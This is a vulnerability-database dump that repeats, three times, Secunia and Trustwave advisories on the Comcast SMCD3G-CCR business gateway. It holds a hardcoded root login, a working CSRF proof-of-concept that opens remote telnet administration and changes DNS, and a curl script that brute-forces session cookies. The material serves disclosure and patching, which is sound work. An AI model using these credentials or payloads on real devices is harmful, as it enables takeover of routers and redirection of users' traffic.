http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Trustwave's SpiderLabs Security Advisory TWSL2011-001: Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways (SMCD3G-CCR) https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt Published: 2011-02-04 Version: 1.0 Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com) Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR Version affected: Versions prior to 1.4.0.49.2 Product description: The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of cable internet services for Comcast Business Class customers with enhanced services including Network Address Translation (NAT), firewalling, and Virtual Private Network (VPN) termination. Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs Finding 1: Static Credentials CVE: CVE-2011-0885 All SMCD3G-CCR gateways provided by Comcast have an administrative login of "mso" with the password of "D0nt4g3tme". These passwords are not provided as a part of the installation of the device and are not recommended to be changed, thus the majority of users are unaware of the default configuration. With these default credentials, internal attackers can modify device configurations to leverage more significant attacks, including redirection of DNS requests, creation of a remote VPN termination point, and modification of NAT entries. These credentials provide access to the web interface for management, as well as a telnet interface that provides shell access to the device. The mso login provides shell as UID 0 (root). Finding 2: Cross Site Request Forgery (CSRF) CVE: CVE-2011-0886 SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against numerous management pages allowing an attacker to embed in a webpage a malicious request against the gateway's management interface. Through this, an attacker can modify device configuration and enable remote administration via a telnet shell and http. The following Proof of Concept (PoC) connects to the gateway, logs in, modifies the remote administration to allow any user to connect externally, and modifies the DNS information. ## smcd3g-csrf-poc.htm <html> <body> <iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1"> </iframe> <iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1"> </iframe> <iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1"> </iframe> </body> </html> ## smcd3g-csrf-poc-1.htm <html> <body> <form action="http://10.1.10.1/goform/login" method="post" name="tF"> <input type="hidden" name="user" value="mso" /> <input type="hidden" name="pws" value="D0nt4g3tme" /> </form> <script> document.tF.submit(); </script> </body> </html> ## smcd3g-csrf-poc-2.htm <html> <body> <form action="http://10.1.10.1/goform/RemoteRange" name="RMangement" method="post"> <input type="hidden" value="feat-admin-remote" name="file"> <input type="hidden" value="admin/" name="dir"> <input type="hidden" name="RemoteRange" value="0" /> <input type="hidden" name="rm_access" value="on" /> <input type="hidden" name="Remote0" value="0.0.0.0,0.0.0.0,1" /> <input type="hidden" name="http_port" value="8080" /> <input type="hidden" name="http_enable" value="on" /> <input type="hidden" name="http_flag" value="1" /> <input type="hidden" name="msoremote_enableCheck" value="on" /> <input type="hidden" name="mso_remote_enable" value="1" /> <input type="hidden" name="remote_enable" value="0" /> <input type="hidden" name="https_enable" value="on" /> <input type="hidden" name="https_port" value="8181" /> <input type="hidden" name="https_flag" value="1" /> <input type="hidden" name="telnet_enable" value="on" /> <input type="hidden" name="telnet_port" value="2323" /> <input type="hidden" name="telnet_flag" value="1" /> <input type="hidden" name="Remote1=" value="" /> </form> </body> </html> <script> setTimeout("document.RMangement.submit()",4000); </script> </body> </html> ## smcd3g-csrf-poc-3.htm <html> <body> <form name="WanIPform" action="http://10.1.10.1/goform/Basic" method="post"> <input type="hidden" value="feat-wan-ip" name="file"> <input type="hidden" value="admin/" name="dir"> <input type="hidden" value="Fixed" name="DNSAssign"> <input type="hidden" value="0" name="dhcpc_release"> <input type="hidden" value="0" name="dhcpc_renew"> <input type="hidden" value="" name="domain_name"> <input type="hidden" value="" name="WDn"> <input type="hidden" name="SysName" value="" /> <input type="hidden" name="manual_dns_enable" value="on" /> <input type="hidden" name="DAddr" value="4.2.2.1" /> <input type="hidden" name="DAddr0" value="4" /> <input type="hidden" name="DAddr1" value="2" /> <input type="hidden" name="DAddr2" value="2" /> <input type="hidden" name="DAddr3" value="1" /> <input type="hidden" name="PDAddr" value="4.2.2.2" /> <input type="hidden" name="PDAddr0" value="4" /> <input type="hidden" name="PDAddr1" value="2" /> <input type="hidden" name="PDAddr2" value="2" /> <input type="hidden" name="PDAddr3" value="2" /> </form> <script> setTimeout("document.WanIPform.submit()",5000); </script> </body> </html> If the PoC was embedded in any web page the targeted user visited while logged into the device, the attacker would be provided remote administration in to the gateway device include a telnet shell. This would allow the attacker to redirect traffic to a malicious end-point. Finding 3: Weak Session Management CVE: CVE-2011-0887 SMCD3G-CCR gateways provided by Comcast utilize a predictable value to validate the active web management portal session. The epoch time of beginning of the session is stored as a cookie labeled "userid". This provides a predictable range of session IDs that can be brute-forced. The following PoC attempts to brute force the session IDs by requesting the admin page with an incrementing cookie and determining whether it wants to redirect to login.asp. ## smcd3g-session-poc.sh #!/bin/bash start=1267604160 end=1267605960 for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt "1" ] then echo "Session ID Found: $i" fi if [ $(($i % 100)) -eq "0" ] then echo "Currently at $i" fi done Through this, an attacker can brute-force the possible valid session IDs. Sessions do by default expire within 10 minutes, thus the attack window is limited but can be leveraged with other attack methods. Vendor Response: These issues have been addressed as of version 1.4.0.49.2 Remediation Steps: In order to determine if the correct version is installed, users should view the "About" link in the management interface. Versions 1.4.0.49.2 and above have been corrected. Vendor Communication Timeline: 08/30/10 - Vulnerability disclosed 01/21/11 - Patch Released 02/04/11 - Advisory Published Revision History: 1.0 Initial publication References 1. http://www.smc.com/index.cfm?event=viewProduct&pid=1678 About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
VAR-201102-0085 CVE-2011-0887 SMC SMCD3G-CCR of Web Management portal Vulnerable to session hijacking CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
The web management portal on the SMC SMCD3G-CCR (aka Comcast Business Gateway) with firmware before 1.4.0.49.2 uses predictable session IDs based on time values, which makes it easier for remote attackers to hijack sessions via a brute-force attack on the userid cookie. Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways. Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible. Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected. ---------------------------------------------------------------------- Get a tax break on purchases of Secunia Solutions! If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/ ---------------------------------------------------------------------- TITLE: SMC SMCD3G-CCR Two Vulnerabilities SECUNIA ADVISORY ID: SA43199 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43199/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43199 RELEASE DATE: 2011-03-05 DISCUSS ADVISORY: http://secunia.com/advisories/43199/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43199/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43199 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can be exploited by malicious people to conduct brute force and cross-site request forgery attacks. 2) The web management application allows users to perform certain actions via HTTP requests without making proper validity checks to verify the requests. This can be exploited to e.g. enable management via Telnet by tricking an administrator into visiting a malicious web site while being logged-in to the application. SOLUTION: Reportedly fixed in firmware version 1.4.0.49.2. PROVIDED AND/OR DISCOVERED BY: Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs. ORIGINAL ADVISORY: Trustwave's SpiderLabs (TWSL2011-002): https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Trustwave's SpiderLabs Security Advisory TWSL2011-001: Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways (SMCD3G-CCR) https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt Published: 2011-02-04 Version: 1.0 Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com) Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR Version affected: Versions prior to 1.4.0.49.2 Product description: The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of cable internet services for Comcast Business Class customers with enhanced services including Network Address Translation (NAT), firewalling, and Virtual Private Network (VPN) termination. Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs Finding 1: Static Credentials CVE: CVE-2011-0885 All SMCD3G-CCR gateways provided by Comcast have an administrative login of "mso" with the password of "D0nt4g3tme". These passwords are not provided as a part of the installation of the device and are not recommended to be changed, thus the majority of users are unaware of the default configuration. With these default credentials, internal attackers can modify device configurations to leverage more significant attacks, including redirection of DNS requests, creation of a remote VPN termination point, and modification of NAT entries. These credentials provide access to the web interface for management, as well as a telnet interface that provides shell access to the device. The mso login provides shell as UID 0 (root). Finding 2: Cross Site Request Forgery (CSRF) CVE: CVE-2011-0886 SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against numerous management pages allowing an attacker to embed in a webpage a malicious request against the gateway's management interface. Through this, an attacker can modify device configuration and enable remote administration via a telnet shell and http. The following Proof of Concept (PoC) connects to the gateway, logs in, modifies the remote administration to allow any user to connect externally, and modifies the DNS information. ## smcd3g-csrf-poc.htm <html> <body> <iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1"> </iframe> <iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1"> </iframe> <iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1"> </iframe> </body> </html> ## smcd3g-csrf-poc-1.htm <html> <body> <form action="http://10.1.10.1/goform/login" method="post" name="tF"> <input type="hidden" name="user" value="mso" /> <input type="hidden" name="pws" value="D0nt4g3tme" /> </form> <script> document.tF.submit(); </script> </body> </html> ## smcd3g-csrf-poc-2.htm <html> <body> <form action="http://10.1.10.1/goform/RemoteRange" name="RMangement" method="post"> <input type="hidden" value="feat-admin-remote" name="file"> <input type="hidden" value="admin/" name="dir"> <input type="hidden" name="RemoteRange" value="0" /> <input type="hidden" name="rm_access" value="on" /> <input type="hidden" name="Remote0" value="0.0.0.0,0.0.0.0,1" /> <input type="hidden" name="http_port" value="8080" /> <input type="hidden" name="http_enable" value="on" /> <input type="hidden" name="http_flag" value="1" /> <input type="hidden" name="msoremote_enableCheck" value="on" /> <input type="hidden" name="mso_remote_enable" value="1" /> <input type="hidden" name="remote_enable" value="0" /> <input type="hidden" name="https_enable" value="on" /> <input type="hidden" name="https_port" value="8181" /> <input type="hidden" name="https_flag" value="1" /> <input type="hidden" name="telnet_enable" value="on" /> <input type="hidden" name="telnet_port" value="2323" /> <input type="hidden" name="telnet_flag" value="1" /> <input type="hidden" name="Remote1=" value="" /> </form> </body> </html> <script> setTimeout("document.RMangement.submit()",4000); </script> </body> </html> ## smcd3g-csrf-poc-3.htm <html> <body> <form name="WanIPform" action="http://10.1.10.1/goform/Basic" method="post"> <input type="hidden" value="feat-wan-ip" name="file"> <input type="hidden" value="admin/" name="dir"> <input type="hidden" value="Fixed" name="DNSAssign"> <input type="hidden" value="0" name="dhcpc_release"> <input type="hidden" value="0" name="dhcpc_renew"> <input type="hidden" value="" name="domain_name"> <input type="hidden" value="" name="WDn"> <input type="hidden" name="SysName" value="" /> <input type="hidden" name="manual_dns_enable" value="on" /> <input type="hidden" name="DAddr" value="4.2.2.1" /> <input type="hidden" name="DAddr0" value="4" /> <input type="hidden" name="DAddr1" value="2" /> <input type="hidden" name="DAddr2" value="2" /> <input type="hidden" name="DAddr3" value="1" /> <input type="hidden" name="PDAddr" value="4.2.2.2" /> <input type="hidden" name="PDAddr0" value="4" /> <input type="hidden" name="PDAddr1" value="2" /> <input type="hidden" name="PDAddr2" value="2" /> <input type="hidden" name="PDAddr3" value="2" /> </form> <script> setTimeout("document.WanIPform.submit()",5000); </script> </body> </html> If the PoC was embedded in any web page the targeted user visited while logged into the device, the attacker would be provided remote administration in to the gateway device include a telnet shell. This would allow the attacker to redirect traffic to a malicious end-point. Finding 3: Weak Session Management CVE: CVE-2011-0887 SMCD3G-CCR gateways provided by Comcast utilize a predictable value to validate the active web management portal session. The epoch time of beginning of the session is stored as a cookie labeled "userid". This provides a predictable range of session IDs that can be brute-forced. The following PoC attempts to brute force the session IDs by requesting the admin page with an incrementing cookie and determining whether it wants to redirect to login.asp. ## smcd3g-session-poc.sh #!/bin/bash start=1267604160 end=1267605960 for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt "1" ] then echo "Session ID Found: $i" fi if [ $(($i % 100)) -eq "0" ] then echo "Currently at $i" fi done Through this, an attacker can brute-force the possible valid session IDs. Sessions do by default expire within 10 minutes, thus the attack window is limited but can be leveraged with other attack methods. Vendor Response: These issues have been addressed as of version 1.4.0.49.2 Remediation Steps: In order to determine if the correct version is installed, users should view the "About" link in the management interface. Versions 1.4.0.49.2 and above have been corrected. Vendor Communication Timeline: 08/30/10 - Vulnerability disclosed 01/21/11 - Patch Released 02/04/11 - Advisory Published Revision History: 1.0 Initial publication References 1. http://www.smc.com/index.cfm?event=viewProduct&pid=1678 About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
VAR-201102-0083 CVE-2011-0885 SMC SMCD3G-CCR of specific Comcast Business Gateway Vulnerabilities that gain management access in settings CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
A certain Comcast Business Gateway configuration of the SMC SMCD3G-CCR with firmware before 1.4.0.49.2 has a default password of D0nt4g3tme for the mso account, which makes it easier for remote attackers to obtain administrative access via the (1) web interface or (2) TELNET interface. Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways. Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible. Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected. ---------------------------------------------------------------------- Get a tax break on purchases of Secunia Solutions! If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/ ---------------------------------------------------------------------- TITLE: SMC SMCD3G-CCR Two Vulnerabilities SECUNIA ADVISORY ID: SA43199 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43199/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43199 RELEASE DATE: 2011-03-05 DISCUSS ADVISORY: http://secunia.com/advisories/43199/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43199/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43199 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can be exploited by malicious people to conduct brute force and cross-site request forgery attacks. 1) The web management application generates session identifiers incrementally, which can be exploited to brute force a valid session identifier via the "userid" cookie. 2) The web management application allows users to perform certain actions via HTTP requests without making proper validity checks to verify the requests. This can be exploited to e.g. enable management via Telnet by tricking an administrator into visiting a malicious web site while being logged-in to the application. SOLUTION: Reportedly fixed in firmware version 1.4.0.49.2. PROVIDED AND/OR DISCOVERED BY: Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs. ORIGINAL ADVISORY: Trustwave's SpiderLabs (TWSL2011-002): https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Trustwave's SpiderLabs Security Advisory TWSL2011-001: Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways (SMCD3G-CCR) https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt Published: 2011-02-04 Version: 1.0 Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com) Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR Version affected: Versions prior to 1.4.0.49.2 Product description: The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of cable internet services for Comcast Business Class customers with enhanced services including Network Address Translation (NAT), firewalling, and Virtual Private Network (VPN) termination. Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs Finding 1: Static Credentials CVE: CVE-2011-0885 All SMCD3G-CCR gateways provided by Comcast have an administrative login of "mso" with the password of "D0nt4g3tme". These passwords are not provided as a part of the installation of the device and are not recommended to be changed, thus the majority of users are unaware of the default configuration. With these default credentials, internal attackers can modify device configurations to leverage more significant attacks, including redirection of DNS requests, creation of a remote VPN termination point, and modification of NAT entries. These credentials provide access to the web interface for management, as well as a telnet interface that provides shell access to the device. The mso login provides shell as UID 0 (root). Finding 2: Cross Site Request Forgery (CSRF) CVE: CVE-2011-0886 SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against numerous management pages allowing an attacker to embed in a webpage a malicious request against the gateway's management interface. Through this, an attacker can modify device configuration and enable remote administration via a telnet shell and http. The following Proof of Concept (PoC) connects to the gateway, logs in, modifies the remote administration to allow any user to connect externally, and modifies the DNS information. ## smcd3g-csrf-poc.htm <html> <body> <iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1"> </iframe> <iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1"> </iframe> <iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1"> </iframe> </body> </html> ## smcd3g-csrf-poc-1.htm <html> <body> <form action="http://10.1.10.1/goform/login" method="post" name="tF"> <input type="hidden" name="user" value="mso" /> <input type="hidden" name="pws" value="D0nt4g3tme" /> </form> <script> document.tF.submit(); </script> </body> </html> ## smcd3g-csrf-poc-2.htm <html> <body> <form action="http://10.1.10.1/goform/RemoteRange" name="RMangement" method="post"> <input type="hidden" value="feat-admin-remote" name="file"> <input type="hidden" value="admin/" name="dir"> <input type="hidden" name="RemoteRange" value="0" /> <input type="hidden" name="rm_access" value="on" /> <input type="hidden" name="Remote0" value="0.0.0.0,0.0.0.0,1" /> <input type="hidden" name="http_port" value="8080" /> <input type="hidden" name="http_enable" value="on" /> <input type="hidden" name="http_flag" value="1" /> <input type="hidden" name="msoremote_enableCheck" value="on" /> <input type="hidden" name="mso_remote_enable" value="1" /> <input type="hidden" name="remote_enable" value="0" /> <input type="hidden" name="https_enable" value="on" /> <input type="hidden" name="https_port" value="8181" /> <input type="hidden" name="https_flag" value="1" /> <input type="hidden" name="telnet_enable" value="on" /> <input type="hidden" name="telnet_port" value="2323" /> <input type="hidden" name="telnet_flag" value="1" /> <input type="hidden" name="Remote1=" value="" /> </form> </body> </html> <script> setTimeout("document.RMangement.submit()",4000); </script> </body> </html> ## smcd3g-csrf-poc-3.htm <html> <body> <form name="WanIPform" action="http://10.1.10.1/goform/Basic" method="post"> <input type="hidden" value="feat-wan-ip" name="file"> <input type="hidden" value="admin/" name="dir"> <input type="hidden" value="Fixed" name="DNSAssign"> <input type="hidden" value="0" name="dhcpc_release"> <input type="hidden" value="0" name="dhcpc_renew"> <input type="hidden" value="" name="domain_name"> <input type="hidden" value="" name="WDn"> <input type="hidden" name="SysName" value="" /> <input type="hidden" name="manual_dns_enable" value="on" /> <input type="hidden" name="DAddr" value="4.2.2.1" /> <input type="hidden" name="DAddr0" value="4" /> <input type="hidden" name="DAddr1" value="2" /> <input type="hidden" name="DAddr2" value="2" /> <input type="hidden" name="DAddr3" value="1" /> <input type="hidden" name="PDAddr" value="4.2.2.2" /> <input type="hidden" name="PDAddr0" value="4" /> <input type="hidden" name="PDAddr1" value="2" /> <input type="hidden" name="PDAddr2" value="2" /> <input type="hidden" name="PDAddr3" value="2" /> </form> <script> setTimeout("document.WanIPform.submit()",5000); </script> </body> </html> If the PoC was embedded in any web page the targeted user visited while logged into the device, the attacker would be provided remote administration in to the gateway device include a telnet shell. This would allow the attacker to redirect traffic to a malicious end-point. Finding 3: Weak Session Management CVE: CVE-2011-0887 SMCD3G-CCR gateways provided by Comcast utilize a predictable value to validate the active web management portal session. The epoch time of beginning of the session is stored as a cookie labeled "userid". This provides a predictable range of session IDs that can be brute-forced. The following PoC attempts to brute force the session IDs by requesting the admin page with an incrementing cookie and determining whether it wants to redirect to login.asp. ## smcd3g-session-poc.sh #!/bin/bash start=1267604160 end=1267605960 for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt "1" ] then echo "Session ID Found: $i" fi if [ $(($i % 100)) -eq "0" ] then echo "Currently at $i" fi done Through this, an attacker can brute-force the possible valid session IDs. Sessions do by default expire within 10 minutes, thus the attack window is limited but can be leveraged with other attack methods. Vendor Response: These issues have been addressed as of version 1.4.0.49.2 Remediation Steps: In order to determine if the correct version is installed, users should view the "About" link in the management interface. Versions 1.4.0.49.2 and above have been corrected. Vendor Communication Timeline: 08/30/10 - Vulnerability disclosed 01/21/11 - Patch Released 02/04/11 - Advisory Published Revision History: 1.0 Initial publication References 1. http://www.smc.com/index.cfm?event=viewProduct&pid=1678 About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
VAR-201102-0386 No CVE Moxa Device Manager 'MDMUtil.dll' Remote Buffer Overflow Vulnerability CVSS V2: -
CVSS V3: -
Severity: LOW
Moxa Device Manager is a remote management tool for Moxa's embedded computers. The \"MDMUtil.dll\" module has a boundary error when processing certain messages, tempting the user to link to a malicious MDM gateway to trigger a stack-based buffer overflow. Successful exploitation of a vulnerability can execute arbitrary instructions in an application security context. Failed exploit attempts will result in a denial-of-service condition
VAR-201102-0225 CVE-2011-0385 Cisco TelePresence Recording Server and Cisco TelePresence Multipoint Switch Vulnerability in CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
